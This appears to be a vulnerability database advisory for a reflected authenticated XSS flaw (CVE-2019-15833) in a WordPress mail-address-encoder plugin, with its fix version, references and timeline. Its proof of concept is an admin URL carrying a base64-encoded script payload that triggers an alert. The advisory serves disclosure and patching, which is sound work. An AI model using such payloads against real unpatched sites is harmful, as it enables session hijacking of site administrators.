Simple Mail Address Encoder <= 1.6.1 - Reflected Authenticated XSS
Description
Reflected XSS via the base64-encoded fwurl parameter, which is only rendered once the plugin has been in use for 30 days and shows its donation notice.
Proof of Concept
https://<BLOG>/wp-admin/options-general.php?page=smae&smaeaction=remind&fwurl=Iyc7YWxlcnQoL1hTUy8pOy8v

Affects Plugin

Fixed in version 1.7

References

CVE 2019-15833
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2116080%40simple-mail-address-encoder&old=2010635%40simple-mail-address-encoder

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 3159
Verified No
WPVDB ID 9418

Timeline

Publicly Published 2019-07-03 (4 months ago)
Added 2019-07-03 (4 months ago)
Last Updated 2019-08-30 (3 months ago)